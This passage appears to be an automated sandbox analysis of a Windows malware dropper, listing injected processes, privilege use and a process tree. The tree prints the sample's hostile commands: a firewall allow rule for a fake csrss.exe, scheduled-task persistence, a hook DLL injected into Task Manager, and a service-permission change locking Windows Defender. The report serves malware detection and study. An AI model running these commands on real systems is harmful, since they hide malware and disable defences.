13d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	13evA9wal9gieIRSHOIx7DVn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	13evA9wal9gieIRSHOIx7DVn.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exepowershell.exepowershell.exepowershell.exeQg_Appv5.exeUniversalInstaller.exeUniversalInstaller.execmd.exebRl4jNgMLsMxBemHk5tIPc28.exe1Y5p0DBnCJqnlXI8OmDX7JHB.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exeMSBuild.exepowershell.exepowershell.exepowershell.exe

pid	process
320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
4576	powershell.exe
4576	powershell.exe
228	powershell.exe
228	powershell.exe
4576	powershell.exe
228	powershell.exe
4576	powershell.exe
228	powershell.exe
4136	Qg_Appv5.exe
4136	Qg_Appv5.exe
4136	Qg_Appv5.exe
4136	Qg_Appv5.exe
4136	Qg_Appv5.exe
1324	UniversalInstaller.exe
2096	UniversalInstaller.exe
2096	UniversalInstaller.exe
2096	UniversalInstaller.exe
2200	cmd.exe
2200	cmd.exe
2200	cmd.exe
2200	cmd.exe
4628	bRl4jNgMLsMxBemHk5tIPc28.exe
4628	bRl4jNgMLsMxBemHk5tIPc28.exe
2112	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
2112	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3060	powershell.exe
3060	powershell.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3060	powershell.exe
3060	powershell.exe
3204	MSBuild.exe
3204	MSBuild.exe
5100	powershell.exe
5100	powershell.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
5100	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
5100	powershell.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
4380	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

UniversalInstaller.execmd.exe

pid process

2096 UniversalInstaller.exe
2200 cmd.exe
2200 cmd.exe

pid	process
2096	UniversalInstaller.exe
2200	cmd.exe
2200	cmd.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exeWMIC.exebRl4jNgMLsMxBemHk5tIPc28.exe1Y5p0DBnCJqnlXI8OmDX7JHB.exeMSBuild.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe
Token: SeDebugPrivilege	4728	AddInProcess32.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeIncreaseQuotaPrivilege	2144	WMIC.exe
Token: SeSecurityPrivilege	2144	WMIC.exe
Token: SeTakeOwnershipPrivilege	2144	WMIC.exe
Token: SeLoadDriverPrivilege	2144	WMIC.exe
Token: SeSystemProfilePrivilege	2144	WMIC.exe
Token: SeSystemtimePrivilege	2144	WMIC.exe
Token: SeProfSingleProcessPrivilege	2144	WMIC.exe
Token: SeIncBasePriorityPrivilege	2144	WMIC.exe
Token: SeCreatePagefilePrivilege	2144	WMIC.exe
Token: SeBackupPrivilege	2144	WMIC.exe
Token: SeRestorePrivilege	2144	WMIC.exe
Token: SeShutdownPrivilege	2144	WMIC.exe
Token: SeDebugPrivilege	2144	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2144	WMIC.exe
Token: SeRemoteShutdownPrivilege	2144	WMIC.exe
Token: SeUndockPrivilege	2144	WMIC.exe
Token: SeManageVolumePrivilege	2144	WMIC.exe
Token: 33	2144	WMIC.exe
Token: 34	2144	WMIC.exe
Token: 35	2144	WMIC.exe
Token: 36	2144	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2144	WMIC.exe
Token: SeSecurityPrivilege	2144	WMIC.exe
Token: SeTakeOwnershipPrivilege	2144	WMIC.exe
Token: SeLoadDriverPrivilege	2144	WMIC.exe
Token: SeSystemProfilePrivilege	2144	WMIC.exe
Token: SeSystemtimePrivilege	2144	WMIC.exe
Token: SeProfSingleProcessPrivilege	2144	WMIC.exe
Token: SeIncBasePriorityPrivilege	2144	WMIC.exe
Token: SeCreatePagefilePrivilege	2144	WMIC.exe
Token: SeBackupPrivilege	2144	WMIC.exe
Token: SeRestorePrivilege	2144	WMIC.exe
Token: SeShutdownPrivilege	2144	WMIC.exe
Token: SeDebugPrivilege	2144	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2144	WMIC.exe
Token: SeRemoteShutdownPrivilege	2144	WMIC.exe
Token: SeUndockPrivilege	2144	WMIC.exe
Token: SeManageVolumePrivilege	2144	WMIC.exe
Token: 33	2144	WMIC.exe
Token: 34	2144	WMIC.exe
Token: 35	2144	WMIC.exe
Token: 36	2144	WMIC.exe
Token: SeDebugPrivilege	4628	bRl4jNgMLsMxBemHk5tIPc28.exe
Token: SeImpersonatePrivilege	4628	bRl4jNgMLsMxBemHk5tIPc28.exe
Token: SeDebugPrivilege	2112	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Token: SeImpersonatePrivilege	2112	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Token: SeDebugPrivilege	3204	MSBuild.exe
Token: SeDebugPrivilege	632	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

u3p4.1.exe

pid process

4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u3p4.1.exe

pid process

4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
4328 u3p4.1.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

Qg_Appv5.exeUniversalInstaller.exeUniversalInstaller.exeMSBuild.exe

pid process

4136 Qg_Appv5.exe
1324 UniversalInstaller.exe
1324 UniversalInstaller.exe
2096 UniversalInstaller.exe
2096 UniversalInstaller.exe
3204 MSBuild.exe

pid	process
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe

pid	process
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe
4328	u3p4.1.exe

pid	process
4136	Qg_Appv5.exe
1324	UniversalInstaller.exe
1324	UniversalInstaller.exe
2096	UniversalInstaller.exe
2096	UniversalInstaller.exe
3204	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exeAddInProcess32.exee3HkPHXOGfuVQUTw1Xvp757T.exe13evA9wal9gieIRSHOIx7DVn.exePs6Oo1KnG5cl0a9XxX9mCevu.exe13evA9wal9gieIRSHOIx7DVn.exeInstall.exeforfiles.execmd.exebRl4jNgMLsMxBemHk5tIPc28.exe

description	pid	process	target process
PID 320 wrote to memory of 4572	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	regasm.exe
PID 320 wrote to memory of 4572	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	regasm.exe
PID 320 wrote to memory of 4572	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	regasm.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4620	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4620	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 320 wrote to memory of 4620	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 4728 wrote to memory of 4792	4728	AddInProcess32.exe	e3HkPHXOGfuVQUTw1Xvp757T.exe
PID 4728 wrote to memory of 4792	4728	AddInProcess32.exe	e3HkPHXOGfuVQUTw1Xvp757T.exe
PID 4728 wrote to memory of 4792	4728	AddInProcess32.exe	e3HkPHXOGfuVQUTw1Xvp757T.exe
PID 4728 wrote to memory of 2112	4728	AddInProcess32.exe	svchost.exe
PID 4728 wrote to memory of 2112	4728	AddInProcess32.exe	svchost.exe
PID 4728 wrote to memory of 2112	4728	AddInProcess32.exe	svchost.exe
PID 4728 wrote to memory of 4628	4728	AddInProcess32.exe	Conhost.exe
PID 4728 wrote to memory of 4628	4728	AddInProcess32.exe	Conhost.exe
PID 4728 wrote to memory of 4628	4728	AddInProcess32.exe	Conhost.exe
PID 4792 wrote to memory of 3116	4792	e3HkPHXOGfuVQUTw1Xvp757T.exe	u3p4.0.exe
PID 4792 wrote to memory of 3116	4792	e3HkPHXOGfuVQUTw1Xvp757T.exe	u3p4.0.exe
PID 4792 wrote to memory of 3116	4792	e3HkPHXOGfuVQUTw1Xvp757T.exe	u3p4.0.exe
PID 4728 wrote to memory of 4840	4728	AddInProcess32.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4728 wrote to memory of 4840	4728	AddInProcess32.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4728 wrote to memory of 4840	4728	AddInProcess32.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 4132	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 4132	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 4132	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4728 wrote to memory of 3768	4728	AddInProcess32.exe	Ps6Oo1KnG5cl0a9XxX9mCevu.exe
PID 4728 wrote to memory of 3768	4728	AddInProcess32.exe	Ps6Oo1KnG5cl0a9XxX9mCevu.exe
PID 4728 wrote to memory of 3768	4728	AddInProcess32.exe	Ps6Oo1KnG5cl0a9XxX9mCevu.exe
PID 3768 wrote to memory of 780	3768	Ps6Oo1KnG5cl0a9XxX9mCevu.exe	Install.exe
PID 3768 wrote to memory of 780	3768	Ps6Oo1KnG5cl0a9XxX9mCevu.exe	Install.exe
PID 3768 wrote to memory of 780	3768	Ps6Oo1KnG5cl0a9XxX9mCevu.exe	Install.exe
PID 4840 wrote to memory of 1092	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 1092	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 1092	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4728 wrote to memory of 3968	4728	AddInProcess32.exe	NS6rGAGIv4P400sLxCOtLJyY.exe
PID 4728 wrote to memory of 3968	4728	AddInProcess32.exe	NS6rGAGIv4P400sLxCOtLJyY.exe
PID 4840 wrote to memory of 1488	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 1488	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 4840 wrote to memory of 1488	4840	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 1488 wrote to memory of 1936	1488	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 1488 wrote to memory of 1936	1488	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 1488 wrote to memory of 1936	1488	13evA9wal9gieIRSHOIx7DVn.exe	13evA9wal9gieIRSHOIx7DVn.exe
PID 780 wrote to memory of 4224	780	Install.exe	forfiles.exe
PID 780 wrote to memory of 4224	780	Install.exe	forfiles.exe
PID 780 wrote to memory of 4224	780	Install.exe	forfiles.exe
PID 4224 wrote to memory of 3960	4224	forfiles.exe	assistant_installer.exe
PID 4224 wrote to memory of 3960	4224	forfiles.exe	assistant_installer.exe
PID 4224 wrote to memory of 3960	4224	forfiles.exe	assistant_installer.exe
PID 3960 wrote to memory of 4440	3960	cmd.exe	powershell.exe
PID 3960 wrote to memory of 4440	3960	cmd.exe	powershell.exe
PID 3960 wrote to memory of 4440	3960	cmd.exe	powershell.exe
PID 780 wrote to memory of 2964	780	Install.exe	schtasks.exe
PID 780 wrote to memory of 2964	780	Install.exe	schtasks.exe
PID 780 wrote to memory of 2964	780	Install.exe	schtasks.exe
PID 4628 wrote to memory of 4576	4628	bRl4jNgMLsMxBemHk5tIPc28.exe	powershell.exe
PID 4628 wrote to memory of 4576	4628	bRl4jNgMLsMxBemHk5tIPc28.exe	powershell.exe
PID 4628 wrote to memory of 4576	4628	bRl4jNgMLsMxBemHk5tIPc28.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe
"C:\Users\Admin\AppData\Local\Temp\b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
2⤵
PID:4572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728

C:\Users\Admin\Pictures\e3HkPHXOGfuVQUTw1Xvp757T.exe
"C:\Users\Admin\Pictures\e3HkPHXOGfuVQUTw1Xvp757T.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4792

C:\Users\Admin\AppData\Local\Temp\u3p4.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3p4.0.exe"
4⤵
- Executes dropped EXE
PID:3116

C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1324

C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
7⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2200

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3204

C:\Users\Admin\AppData\Local\Temp\u3p4.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3p4.1.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4328

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Users\Admin\Pictures\1Y5p0DBnCJqnlXI8OmDX7JHB.exe
"C:\Users\Admin\Pictures\1Y5p0DBnCJqnlXI8OmDX7JHB.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228

C:\Users\Admin\Pictures\1Y5p0DBnCJqnlXI8OmDX7JHB.exe
"C:\Users\Admin\Pictures\1Y5p0DBnCJqnlXI8OmDX7JHB.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4220

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:4168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1272

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:444

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4032

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3780

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
PID:1040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:1720

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:752

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:4268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:1468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:1600

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
PID:2244

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:4508

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
PID:2508

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:3492

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
PID:5060

C:\Users\Admin\Pictures\bRl4jNgMLsMxBemHk5tIPc28.exe
"C:\Users\Admin\Pictures\bRl4jNgMLsMxBemHk5tIPc28.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Users\Admin\Pictures\bRl4jNgMLsMxBemHk5tIPc28.exe
"C:\Users\Admin\Pictures\bRl4jNgMLsMxBemHk5tIPc28.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
